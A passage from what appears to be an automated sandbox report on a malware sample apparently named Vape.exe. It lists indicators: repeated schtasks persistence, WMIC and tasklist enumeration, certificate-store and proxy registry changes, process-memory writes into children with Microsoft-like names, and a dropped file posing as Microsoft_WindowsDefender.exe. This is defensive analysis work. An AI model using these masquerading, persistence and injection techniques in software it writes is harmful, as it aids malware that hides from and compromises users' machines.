schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5764 schtasks.exe 5788 schtasks.exe 6668 schtasks.exe 2828 schtasks.exe 5600 schtasks.exe 5700 schtasks.exe 5492 schtasks.exe 6072 schtasks.exe 6368 schtasks.exe 5416 schtasks.exe 6112 schtasks.exe 6600 schtasks.exe 5492 schtasks.exe 6640 schtasks.exe 5552 schtasks.exe 4828 schtasks.exe 6152 schtasks.exe 7116 schtasks.exe 5588 schtasks.exe 6032 schtasks.exe 6604 schtasks.exe 5424 schtasks.exe 5560 schtasks.exe 6452 schtasks.exe 6896 schtasks.exe 3564 schtasks.exe 3788 schtasks.exe 6364 schtasks.exe 6324 schtasks.exe 4040 schtasks.exe 1424 schtasks.exe 3228 schtasks.exe 5272 schtasks.exe 6116 schtasks.exe 7068 schtasks.exe 6712 schtasks.exe 5776 schtasks.exe 864 schtasks.exe 4836 schtasks.exe 5172 schtasks.exe 5816 schtasks.exe 6536 schtasks.exe 6248 schtasks.exe 5416 schtasks.exe 6272 schtasks.exe 2520 schtasks.exe -
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 5524 WMIC.exe 5472 WMIC.exe 8116 WMIC.exe 1996 WMIC.exe 3404 WMIC.exe 4404 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 6672 tasklist.exe 380 tasklist.exe 512 tasklist.exe 5456 tasklist.exe 5468 tasklist.exe 5180 tasklist.exe 5728 tasklist.exe 4108 tasklist.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
mousocoreworker.exeWerFault.exewmiprvse.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 5212 systeminfo.exe 6720 systeminfo.exe -
Kills process with taskkill 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 7344 taskkill.exe 5272 taskkill.exe 6092 taskkill.exe 6372 taskkill.exe 7520 taskkill.exe 6492 taskkill.exe 6900 taskkill.exe 6472 taskkill.exe 7248 taskkill.exe 7756 taskkill.exe 8008 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exemousocoreworker.exedialer.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018800EF584BD80" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs dialer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates dialer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018800EF584BD80 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000074016beb8bc92244934f872812cfa03900000000020000000000106600000001000020000000231be916eea2aed01d3d3c4bad8f4b8dae8ab0b2cd59f124a2f56c2daad51efd000000000e8000000002000020000000facba3eeb2cd7fd85fecae828856bdcfb2299afeb24ecda3b38d66f3fd481ac98000000080001d927ed6cd20281b089aba7c6b0bc219fb9edca22dbf5eef95e0650cbb46584bdf8074daea15f907557d953b97b785db9d0203e6544abaa2ca6a7be34106e029da4d38c8fcb6db5089bd0f3c04ebe765500608da6876c2e748792470418e7cb13d8e582b241de48014bfd04e8d96172802fbeb11ec034ba05ddf4aa7b51740000000a230e537ea0874579439b8d114effa74fcd13e0540177dc2128525ce9b4624bab3a330e5fcff0165e0f79b3a003c69995277c9e5de6060cfc544e7d94ed6751f mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27F02AA9-5520-40A1-A2DB-02DBD72DA83A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000074016beb8bc92244934f872812cfa039000000000200000000001066000000010000200000006afb435cc21a2d6d5ff1a743c623d423e39b41aa93c28918eed4e68f8ed62880000000000e80000000020000200000004401d2fa43668d2d83cad102286df0d6ad1449d625f1661505306e9457f342d4b0030000b29c48e9478fa0e4ad2b890032fd34395d855c17820a49e0fd4e2696406fd899d2b5fe50c948e2733984beeb0e6fb18f1651687660fb5b3c1b910b6f7df286f7ff438470562e3fec0ed3d5f8a28088f8623475a1f858412d88c52e50a89e2247603bda5e7236231207fcdbebc2b53de02973deda72d5fbc3a61a09801096f207366a5e57ab792c6241d60d428dcf5b67addb43afa95ae7abf46c358f619924ccb09f747fba83a9601d56b1610d307ae8862e48a235e6cd0db1185497de792aa231182b036ba096d477e408a3fe29ed1e7b3d4cd6f7732b3a8a299f28c3add4c51a11d766326019eb7b87e9eeb567cc89fc037d47184dd657dead961a3f8ad8df3c925b41593995429d80c7e9682145a2daec501f5716b32983f146a4bac164fd553d4c8c4d149e84bc9ca9a7269f5f138f087c162d5e0c49bb071b3ed68213fe216832650adf59490301732ba4a0ee28c105f52f2398a8e060cd3230e6009ec85e8800c616e0e04a2101ae18573fcf1bdda9e08454e7d54db788193168ebfd326e3bc5c51efdba5fcb1dbff45f063fefcdbe1f65fe7b149f8b6ede35905f41ab7c915f12ada86a2a55756725dd96cfdc2168abfe132b468a502cf05268e841caf42e3768cc5b18385445f5ca4d5db5ce9d1756020ea56dcdf2bfdbb9199ba86f3f88e36afacb2f6c2e1f8a88c3451085eb0c090307a50b272c4c194ff8cacac84c2564f6e6b707e9dc7fedb8331e5e4dbc8659b02db8f76027e061875d27337529aaf79db39ba9e235e5b090513fcd02ace64c397f342e51df8cca7a9604ddea7ad4f032328308ea48b987cae3d9894046441c8e124f33c0d86b86a3e06f27db71a7048c882eb5fc289e4ad6fa52ab815b1bf932bec8ca450e43932a50458446c6e5da1da27ae4f17a56712e9761dfcf2e936a91af80aff833b2911e23bcf6d49229bbbd45373fcc3cfe64ba0da88f2425c4886e1cf0a7acc39a08cf5a81fb0cba325f514c23064dd7a3a42d4791a577e0bb68e38ac9f97280e1bd6340470ab2b3f49a807cc11b8db10825913b7526faa3f983064714dd5807938b630f0915222db13741ab5cc08166d1d5f1a96ee0853144347f3e1dcecb3d025dd37eddcac9bef2ab59cec43491f05aa18e6c967aea32e0ed8258f59108adf7dc7a124d7290a71f608c5f39d5abd8b3183f1c1b5cf96d2a59956c1da3c9e6d257a5446f95083a71c9e378bb8969dd5f53a8e8ae342a967e2e80acbd309a34422361fb8b21373ad9efc4056c2ae8c74e581fc1c0c196ce746cda38d0e91b8c9d7c0df16e7baad90b037095419f87963d6a94f5b2e15f4000000003010f90857085a2d255ee5713aa9a11fda6c9a30a663ac1ed7c42ebbef807186473d9c33a6bf5fb52612145e8ccc0e4e4e6128758ca3d0c16608cf546fae545 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 22 May 2024 13:40:16 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry class 5 IoCs
Processes:
Microsoft_Protection.exeRuntimeBroker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Microsoft_Protection.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeMicrosoft_crypt.exepowershell.exeIntoref.exedialer.exepowershell.exepowershell.exepowershell.exelhhsgwktkatl.exepowershell.exepowershell.exepowershell.exepid process 1736 powershell.exe 1736 powershell.exe 2172 powershell.exe 2172 powershell.exe 2172 powershell.exe 1736 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 400 Microsoft_crypt.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 3620 Intoref.exe 3620 Intoref.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 5716 dialer.exe 5716 dialer.exe 3228 powershell.exe 3228 powershell.exe 636 powershell.exe 636 powershell.exe 400 Microsoft_crypt.exe 3228 powershell.exe 636 powershell.exe 400 Microsoft_crypt.exe 400 Microsoft_crypt.exe 5768 powershell.exe 5768 powershell.exe 6684 lhhsgwktkatl.exe 6460 powershell.exe 6460 powershell.exe 6700 powershell.exe 6700 powershell.exe 6736 powershell.exe 6736 powershell.exe 5768 powershell.exe 6460 powershell.exe 6700 powershell.exe 6736 powershell.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe 3620 Intoref.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
msedge.exepid process 6704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Msvchost.exetasklist.exeWMIC.exepowershell.exepowershell.exetasklist.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1884 Msvchost.exe Token: SeDebugPrivilege 380 tasklist.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeIncreaseQuotaPrivilege 4928 WMIC.exe Token: SeSecurityPrivilege 4928 WMIC.exe Token: SeTakeOwnershipPrivilege 4928 WMIC.exe Token: SeLoadDriverPrivilege 4928 WMIC.exe Token: SeSystemProfilePrivilege 4928 WMIC.exe Token: SeSystemtimePrivilege 4928 WMIC.exe Token: SeProfSingleProcessPrivilege 4928 WMIC.exe Token: SeIncBasePriorityPrivilege 4928 WMIC.exe Token: SeCreatePagefilePrivilege 4928 WMIC.exe Token: SeBackupPrivilege 4928 WMIC.exe Token: SeRestorePrivilege 4928 WMIC.exe Token: SeShutdownPrivilege 4928 WMIC.exe Token: SeDebugPrivilege 4928 WMIC.exe Token: SeSystemEnvironmentPrivilege 4928 WMIC.exe Token: SeRemoteShutdownPrivilege 4928 WMIC.exe Token: SeUndockPrivilege 4928 WMIC.exe Token: SeManageVolumePrivilege 4928 WMIC.exe Token: 33 4928 WMIC.exe Token: 34 4928 WMIC.exe Token: 35 4928 WMIC.exe Token: 36 4928 WMIC.exe Token: SeDebugPrivilege 512 tasklist.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 2136 WMIC.exe Token: SeSecurityPrivilege 2136 WMIC.exe Token: SeTakeOwnershipPrivilege 2136 WMIC.exe Token: SeLoadDriverPrivilege 2136 WMIC.exe Token: SeSystemProfilePrivilege 2136 WMIC.exe Token: SeSystemtimePrivilege 2136 WMIC.exe Token: SeProfSingleProcessPrivilege 2136 WMIC.exe Token: SeIncBasePriorityPrivilege 2136 WMIC.exe Token: SeCreatePagefilePrivilege 2136 WMIC.exe Token: SeBackupPrivilege 2136 WMIC.exe Token: SeRestorePrivilege 2136 WMIC.exe Token: SeShutdownPrivilege 2136 WMIC.exe Token: SeDebugPrivilege 2136 WMIC.exe Token: SeSystemEnvironmentPrivilege 2136 WMIC.exe Token: SeRemoteShutdownPrivilege 2136 WMIC.exe Token: SeUndockPrivilege 2136 WMIC.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 7468 Conhost.exe 5996 Conhost.exe 7636 Conhost.exe 8064 Conhost.exe 8172 Conhost.exe 4724 Conhost.exe 7176 Conhost.exe 512 Conhost.exe 6224 Conhost.exe 2828 Conhost.exe 7420 Conhost.exe 7952 Conhost.exe 8168 Conhost.exe 5768 Conhost.exe 7208 Conhost.exe 7888 Conhost.exe 2124 Conhost.exe 2372 Conhost.exe 5360 Conhost.exe 7680 Conhost.exe 5352 Conhost.exe 2652 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3604 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Vape.exeMicrosoft_R.exeMicrosoft_Protection.exeMicrosoft_M.exeMicrosoft_R.execmd.execmd.execmd.execmd.execmd.exeMicrosoft_M.execmd.execmd.execmd.execmd.execmd.exeMsvchost.exedescription pid process target process PID 1716 wrote to memory of 4828 1716 Vape.exe Microsoft_Protection.exe PID 1716 wrote to memory of 4828 1716 Vape.exe Microsoft_Protection.exe PID 1716 wrote to memory of 4828 1716 Vape.exe Microsoft_Protection.exe PID 1716 wrote to memory of 400 1716 Vape.exe Microsoft_crypt.exe PID 1716 wrote to memory of 400 1716 Vape.exe Microsoft_crypt.exe PID 1716 wrote to memory of 2852 1716 Vape.exe Microsoft_R.exe PID 1716 wrote to memory of 2852 1716 Vape.exe Microsoft_R.exe PID 2852 wrote to memory of 4692 2852 Microsoft_R.exe Microsoft_R.exe PID 2852 wrote to memory of 4692 2852 Microsoft_R.exe Microsoft_R.exe PID 4828 wrote to memory of 3928 4828 Microsoft_Protection.exe WScript.exe PID 4828 wrote to memory of 3928 4828 Microsoft_Protection.exe WScript.exe PID 4828 wrote to memory of 3928 4828 Microsoft_Protection.exe WScript.exe PID 1716 wrote to memory of 3600 1716 Vape.exe Microsoft_M.exe PID 1716 wrote to memory of 3600 1716 Vape.exe Microsoft_M.exe PID 1716 wrote to memory of 1884 1716 Vape.exe Msvchost.exe PID 1716 wrote to memory of 1884 1716 Vape.exe Msvchost.exe PID 3600 wrote to memory of 4700 3600 Microsoft_M.exe Microsoft_M.exe PID 3600 wrote to memory of 4700 3600 Microsoft_M.exe Microsoft_M.exe PID 4692 wrote to memory of 2240 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 2240 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 4176 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 4176 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 444 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 444 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 2516 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 2516 4692 Microsoft_R.exe cmd.exe PID 444 wrote to memory of 380 444 cmd.exe tasklist.exe PID 444 wrote to memory of 380 444 cmd.exe tasklist.exe PID 2240 wrote to memory of 2172 2240 cmd.exe powershell.exe PID 2240 wrote to memory of 2172 2240 cmd.exe powershell.exe PID 2516 wrote to memory of 4928 2516 cmd.exe WMIC.exe PID 2516 wrote to memory of 4928 2516 cmd.exe WMIC.exe PID 4176 wrote to memory of 1736 4176 cmd.exe powershell.exe PID 4176 wrote to memory of 1736 4176 cmd.exe powershell.exe PID 4692 wrote to memory of 4788 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 4788 4692 Microsoft_R.exe cmd.exe PID 4788 wrote to memory of 2008 4788 cmd.exe reg.exe PID 4788 wrote to memory of 2008 4788 cmd.exe reg.exe PID 4700 wrote to memory of 2832 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 2832 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 2516 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 2516 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 4776 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 4776 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 4996 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 4996 4700 Microsoft_M.exe cmd.exe PID 4692 wrote to memory of 2000 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 2000 4692 Microsoft_R.exe cmd.exe PID 4776 wrote to memory of 512 4776 cmd.exe tasklist.exe PID 4776 wrote to memory of 512 4776 cmd.exe tasklist.exe PID 2832 wrote to memory of 1864 2832 cmd.exe powershell.exe PID 2832 wrote to memory of 1864 2832 cmd.exe powershell.exe PID 2516 wrote to memory of 1736 2516 cmd.exe powershell.exe PID 2516 wrote to memory of 1736 2516 cmd.exe powershell.exe PID 4996 wrote to memory of 2136 4996 cmd.exe tree.com PID 4996 wrote to memory of 2136 4996 cmd.exe tree.com PID 2000 wrote to memory of 3576 2000 cmd.exe Conhost.exe PID 2000 wrote to memory of 3576 2000 cmd.exe Conhost.exe PID 1884 wrote to memory of 4040 1884 Msvchost.exe schtasks.exe PID 1884 wrote to memory of 4040 1884 Msvchost.exe schtasks.exe PID 4692 wrote to memory of 2644 4692 Microsoft_R.exe cmd.exe PID 4692 wrote to memory of 2644 4692 Microsoft_R.exe cmd.exe PID 4700 wrote to memory of 2408 4700 Microsoft_M.exe cmd.exe PID 4700 wrote to memory of 2408 4700 Microsoft_M.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exeC:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe2⤵
-
